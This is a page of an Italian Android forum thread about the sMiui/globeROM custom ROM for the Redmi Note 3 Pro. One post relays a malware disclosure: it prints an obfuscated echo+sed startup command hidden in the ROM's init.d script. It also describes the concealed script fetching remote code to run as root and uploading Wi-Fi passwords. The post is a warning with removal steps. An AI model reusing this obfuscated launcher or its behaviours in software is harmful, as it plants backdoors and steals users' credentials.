CERCA
PER MODELLO
FullScreen Chatbox! :)

Utente del giorno: gianpassa con ben 2 Thanks ricevuti nelle ultime 24 ore
Utente della settimana: 9mm con ben 10 Thanks ricevuti negli ultimi sette giorni
Utente del mese: 9mm con ben 34 Thanks ricevuti nell'ultimo mese

Pagina 4 di 5 primaprima ... 2345 ultimoultimo
Ultima pagina
Visualizzazione dei risultati da 31 a 40 su 45
Discussione:

[ROM] MIUI globeROM

Se questa discussione ti è stata utile, ti preghiamo di lasciare un messaggio di feedback in modo che possa essere preziosa in futuro anche per altri utenti come te!
  1. #31
    Androidiano VIP


    Registrato dal
    May 2013
    Messaggi
    2,879
    Smartphone
    Redmi Note 3 Pro, Honor 6

    Ringraziamenti
    336
    Ringraziato 803 volte in 570 Posts
    Predefinito

    Quote Originariamente inviato da morrison Visualizza il messaggio
    Stessi problema con la stable, soluzioni?
    Come ho detto è una cosa che mi è capitato una volta con la stable e forse causato da un problema di qualche app che si è impallata
    ma poi non mi è capitato mai più.
    Adesso sto con l'ultima developer e dopo diverse ricariche non ho avuto lo stesso problema.

  2.  
  3. #32
    Androidiano VIP L'avatar di Frenz75


    Registrato dal
    Jan 2013
    Messaggi
    1,552

    Ringraziamenti
    129
    Ringraziato 528 volte in 451 Posts
    Predefinito

    Per chi aveva (ha) Error 7 è dovuto al fatto che si tenta di flashare la sMiui con la TWRP 3.0.0.0, quando invece si deve usare la versione più aggiornata 3.0.2 oppure quella di cofface.
    Alla seconda ricarica ho fatto 6 ore e 30 in 40 ore di utilizzo totale. Niente male.

  4. Il seguente Utente ha ringraziato Frenz75 per il post:

    JGian (06-05-16)

  5. #33
    Androidiano VIP L'avatar di Frenz75


    Registrato dal
    Jan 2013
    Messaggi
    1,552

    Ringraziamenti
    129
    Ringraziato 528 volte in 451 Posts
    Predefinito

    E' disponibile la sMiui 6.5.5 la sto scaricando. Dato che sono partito da 1 settimana con questa sMiui, basta flashare da twrp senza fare i wipe giusto?

  6. #34
    Androidiano VIP L'avatar di D4xel


    Registrato dal
    Feb 2013
    Località
    Mugello, Firenze
    Messaggi
    2,182
    Smartphone
    Xiaomi RN 3 PRO, Nokia 6680

    Ringraziamenti
    494
    Ringraziato 488 volte in 421 Posts
    Predefinito

    Quote Originariamente inviato da Frenz75 Visualizza il messaggio
    E' disponibile la sMiui 6.5.5 la sto scaricando. Dato che sono partito da 1 settimana con questa sMiui, basta flashare da twrp senza fare i wipe giusto?
    Se provieni da una precedente sMIUI i wipe cache e dalvik cache sono sempre consigliati!

  7. Il seguente Utente ha ringraziato D4xel per il post:

    Frenz75 (07-05-16)

  8. #35
    Androidiano VIP L'avatar di Frenz75


    Registrato dal
    Jan 2013
    Messaggi
    1,552

    Ringraziamenti
    129
    Ringraziato 528 volte in 451 Posts
    Predefinito

    Non c'è stato verso di poter utilizzare la 6.5.5, dovevo sempre flasharla 2 volte di seguito perchè alla prima mi dava sempre errore. Una volta avviata non funzionava il Mi Account, si connetteva, ma non si poteva entrare nelle impostazioni per poter attivare/disattivare le varie opzioni.

  9. #36
    Androidiano VIP L'avatar di Frenz75


    Registrato dal
    Jan 2013
    Messaggi
    1,552

    Ringraziamenti
    129
    Ringraziato 528 volte in 451 Posts
    Predefinito

    Attenzione a chi usa la sMiui, è stato trovato un malware che oltre a rubare le password dei wifi registrati sul vostro telefono, renderebbe lo stesso telefono vulnerabile e soprattutto sotto il controllo del collaboratore dell'autore della sMiui (sebsch1991) che a quanto pare ha messo volutamente il codice all'interno dela partizione system della rom.

    Questo il messaggio originale di colui che a quanto pare si è accorto del malware:

    At least it downloads ads. But also it allows the author to take control on your phone.
    Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
    Scripts from /system/etc/init.d are run at system start. There is a script "01sMIUI_optimizations". It contains a line

    /system/bin/sh `echo "binajkdpjni%usr" | sed 's!^\(...\)\(.\)...\(.\)..\(i\).\(...\)$!/\5/\1/\2\3\4!g'`

    echo+sed make string "/system/bin/api" and finally the command is

    /system/bin/sh /system/bin/api

    So it just runs "/system/bin/api". And that script does many bad actions, for example:
    - loads new version of the script from smiui_net/api and saves it to the system. The author can place there any code and the code will be executed on your phone with root rights!
    - it uploads the content of the file "/data/misc/wifi/wpa_supplicant.conf" (your Wi-Fi passwords) to smiui_net/api1.php
    - it loads some ads (functions func_PROP, func_REV, func_TOTAL) in the background. In any time, constantly (when it receives "START" from their server)!
    - there is also very very bad function func_SRV (+func_FILES), but it is commented (does not run). It makes your phone a part of the botnet! It loads some binaries (they do not exists for now) and looks like they start some tunnel/proxy on the phone.



    Le soluzioni per chi usa la sMiui sono:

    1 Scaricare l'ultima rom dal sito sMiUI ROM Kitchen

    2 Scaricare Root Explorer App e cancellare i files "/system/bin/api" e "/system/bin/apiget", quindi riavviare il telefono.

    FONTE 1
    FONTE 2

  10. I seguenti 5 Utenti hanno ringraziato Frenz75 per il post:

    D4xel (21-08-16),JGian (25-08-16),markusssss (21-08-16),rognone (20-08-16),Uriens82 (20-08-16)

  11. #37
    Androidiano


    Registrato dal
    Feb 2014
    Messaggi
    109

    Ringraziamenti
    17
    Ringraziato 15 volte in 15 Posts
    Predefinito

    È stata uploadata la nuova 6.8.18 da cui sono state rimosse le stringhe che hai linkato, nel forum miui è stato lo stesso autore a confermare il malware e a informare che la nuova rom adesso è "pulita"... Grazie per la segnalazione!!!

    Inviato dal mio Redmi Note 3 usando Androidiani App

  12. Il seguente Utente ha ringraziato CapitanHarlock75 per il post:

    markusssss (21-08-16)

  13. #38
    Moderatore SENIOR L'avatar di Fortinho


    Registrato dal
    Jan 2012
    Messaggi
    6,385
    Smartphone
    Xiaomi Mi 9T

    Ringraziamenti
    640
    Ringraziato 3,056 volte in 2,161 Posts
    Predefinito

    Il progetto sMiUI è terminato, il tutto passa in mano ad altri developers che continueranno la cosa sotto altro nome: globeROM.
    Modificati titolo e primo post.
    ►---►---►---►---► REGOLAMENTO --- FAQ FORUM --- CONSIGLI PER NUOVI UTENTI --- BBCODES ◄---◄---◄---◄---◄

    ❗ Chiarimenti versioni ROM MIUI + Link + FAQ + Fondamentali ❗


    Arrow OS - Android 11
    Un grazie è sempre gradito

  14. #39
    Senior Droid L'avatar di Wawalord


    Registrato dal
    May 2013
    Messaggi
    368

    Ringraziamenti
    106
    Ringraziato 72 volte in 55 Posts
    Predefinito

    A livello della gestione della ram e del kernel ci sono differenze importanti?
    Sopratutto la prima che è disastrosa nell'ultima Global Stable (Miui 8)
    Oneplus 5 - OOS 4.5.14 - blu_spark kernel r45

    Xiaomi Redmi Note 3 Pro 16 GB (Kenzo) - Unofficial Slim Rom M - Radon Kernel V 3.4

    LG G2 D802 32 GB - AICP 11 - Lambda Kernel Hypnose R8

    Huawei Ascend P1 - Custom P1 XL battery and back cover - CM11 by Niisp - XyyX Kernel

  15. #40
    Senior Droid


    Registrato dal
    Sep 2011
    Messaggi
    995

    Ringraziamenti
    322
    Ringraziato 288 volte in 202 Posts
    Predefinito

    Differenze con le altre rom? Io ho la global dev beta per esempio!

    Inviato dal mio Redmi Note 3 utilizzando Tapatalk
    il tasto THANKS uno sconosciuto?....... usatelo se qualcuno vi aiuta in qualche modo!

Pagina 4 di 5 primaprima ... 2345 ultimoultimo
Ultima pagina

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire risposte
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Torna su
Privacy Policy